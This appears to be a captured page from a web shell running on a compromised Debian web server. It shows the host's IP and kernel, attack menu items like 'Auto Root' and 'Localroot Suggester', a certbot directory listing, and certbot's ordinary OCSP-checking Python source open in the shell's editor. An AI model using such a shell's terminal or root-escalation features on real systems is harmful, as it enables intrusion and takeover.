Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
certbot /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-03-20 10:36
display
[ DIR ]
drwxrwxrwx
2022-03-20 10:36
plugins
[ DIR ]
drwxrwxrwx
2022-03-20 10:36
tests
[ DIR ]
drwxrwxrwx
2022-03-20 10:36
__init__.py
114
B
-rw-r--r--
2018-11-07 22:14
account.py
13.99
KB
-rw-r--r--
2018-11-07 22:14
achallenges.py
1.59
KB
-rw-r--r--
2018-11-07 22:14
auth_handler.py
20.56
KB
-rw-r--r--
2018-11-07 22:14
cert_manager.py
15.1
KB
-rw-r--r--
2018-11-07 22:14
cli.py
70.18
KB
-rw-r--r--
2018-11-07 22:14
client.py
27.86
KB
-rw-r--r--
2018-11-07 22:14
compat.py
6.02
KB
-rw-r--r--
2018-11-07 22:14
configuration.py
5.55
KB
-rw-r--r--
2018-11-07 22:14
constants.py
6.39
KB
-rw-r--r--
2020-09-26 20:25
crypto_util.py
15.29
KB
-rw-r--r--
2018-11-07 22:14
eff.py
3.07
KB
-rw-r--r--
2018-11-07 22:14
error_handler.py
5.81
KB
-rw-r--r--
2018-11-07 22:14
errors.py
2.59
KB
-rw-r--r--
2018-11-07 22:14
hooks.py
8.44
KB
-rw-r--r--
2018-11-07 22:14
interfaces.py
23.3
KB
-rw-r--r--
2018-11-07 22:14
lock.py
3.56
KB
-rw-r--r--
2018-11-07 22:14
log.py
12.39
KB
-rw-r--r--
2018-11-07 22:14
main.py
47.64
KB
-rw-r--r--
2018-11-07 22:14
notify.py
1.04
KB
-rw-r--r--
2018-11-07 22:14
ocsp.py
4.09
KB
-rw-r--r--
2018-11-07 22:14
renewal.py
19.85
KB
-rw-r--r--
2020-09-26 20:25
reporter.py
3.46
KB
-rw-r--r--
2018-11-07 22:14
reverter.py
23.32
KB
-rw-r--r--
2018-11-07 22:14
ssl-dhparams.pem
424
B
-rw-r--r--
2018-11-07 22:14
storage.py
45.75
KB
-rw-r--r--
2018-11-07 22:14
updater.py
3.86
KB
-rw-r--r--
2018-11-07 22:14
util.py
20.35
KB
-rw-r--r--
2018-11-07 22:14
Save
Rename
"""Tools for checking certificate revocation.""" import logging import re from subprocess import Popen, PIPE from certbot import errors from certbot import util logger = logging.getLogger(__name__) class RevocationChecker(object): "This class figures out OCSP checking on this system, and performs it." def __init__(self): self.broken = False if not util.exe_exists("openssl"): logger.info("openssl not installed, can't check revocation") self.broken = True return # New versions of openssl want -header var=val, old ones want -header var val test_host_format = Popen(["openssl", "ocsp", "-header", "var", "val"], stdout=PIPE, stderr=PIPE, universal_newlines=True) _out, err = test_host_format.communicate() if "Missing =" in err: self.host_args = lambda host: ["Host=" + host] else: self.host_args = lambda host: ["Host", host] def ocsp_revoked(self, cert_path, chain_path): """Get revoked status for a particular cert version. .. todo:: Make this a non-blocking call :param str cert_path: Path to certificate :param str chain_path: Path to intermediate cert :rtype bool or None: :returns: True if revoked; False if valid or the check failed """ if self.broken: return False url, host = self.determine_ocsp_server(cert_path) if not host: return False # jdkasten thanks "Bulletproof SSL and TLS - Ivan Ristic" for documenting this! cmd = ["openssl", "ocsp", "-no_nonce", "-issuer", chain_path, "-cert", cert_path, "-url", url, "-CAfile", chain_path, "-verify_other", chain_path, "-trust_other", "-header"] + self.host_args(host) logger.debug("Querying OCSP for %s", cert_path) logger.debug(" ".join(cmd)) try: output, err = util.run_script(cmd, log=logger.debug) except errors.SubprocessError: logger.info("OCSP check failed for %s (are we offline?)", cert_path) return False return _translate_ocsp_query(cert_path, output, err) def determine_ocsp_server(self, cert_path): """Extract the OCSP server host from a certificate. :param str cert_path: Path to the cert we're checking OCSP for :rtype tuple: :returns: (OCSP server URL or None, OCSP server host or None) """ try: url, _err = util.run_script( ["openssl", "x509", "-in", cert_path, "-noout", "-ocsp_uri"], log=logger.debug) except errors.SubprocessError: logger.info("Cannot extract OCSP URI from %s", cert_path) return None, None url = url.rstrip() host = url.partition("://")[2].rstrip("/") if host: return url, host else: logger.info("Cannot process OCSP host from URL (%s) in cert at %s", url, cert_path) return None, None def _translate_ocsp_query(cert_path, ocsp_output, ocsp_errors): """Parse openssl's weird output to work out what it means.""" states = ("good", "revoked", "unknown") patterns = [r"{0}: (WARNING.*)?{1}".format(cert_path, s) for s in states] good, revoked, unknown = (re.search(p, ocsp_output, flags=re.DOTALL) for p in patterns) warning = good.group(1) if good else None if (not "Response verify OK" in ocsp_errors) or (good and warning) or unknown: logger.info("Revocation status for %s is unknown", cert_path) logger.debug("Uncertain output:\n%s\nstderr:\n%s", ocsp_output, ocsp_errors) return False elif good and not warning: return False elif revoked: warning = revoked.group(1) if warning: logger.info("OCSP revocation warning: %s", warning) return True else: logger.warn("Unable to properly parse OCSP output: %s\nstderr:%s", ocsp_output, ocsp_errors) return False